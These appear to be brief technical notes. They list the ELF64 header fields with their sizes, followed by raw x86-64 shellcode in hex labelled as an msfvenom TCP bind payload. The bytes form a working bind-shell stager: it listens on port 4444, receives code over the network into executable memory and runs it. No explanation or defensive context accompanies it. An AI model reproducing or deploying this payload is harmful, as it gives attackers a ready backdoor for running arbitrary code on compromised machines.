------------------------elf64 header
16	e_ident[EI_NIDENT];	/* Magic number and other info */
2	e_type;			/* Object file type */
2	e_machine;		/* Architecture */
4	e_version;		/* Object file version */
8	e_entry;		/* Entry point virtual address */
8	e_phoff;		/* Program header table file offset */
8	e_shoff;		/* Section header table file offset */
4	e_flags;		/* Processor-specific flags */
2	e_ehsize;		/* ELF header size in bytes */
2	e_phentsize;		/* Program header table entry size */
2	e_phnum;		/* Program header table entry count */
2	e_shentsize;		/* Section header table entry size */
2	e_shnum;		/* Section header table entry count */
2	e_shstrndx;		/* Section header string table index */


----- msfvenom tcp bind

6a 29 58 99 6a 02 5f 6a 01 5e 0f 05 48 97
52 c7 04 24 02 00 11 5c 48 89 e6 6a 10 5a
6a 31 58 0f 05 59 6a 32 58 0f 05 48 96 6a
2b 58 0f 05 50 56 5f 6a 09 58 99 b6 10 48
89 d6 4d 31 c9 6a 22 41 5a b2 07 0f 05 48
96 48 97 5f 0f 05 ff e6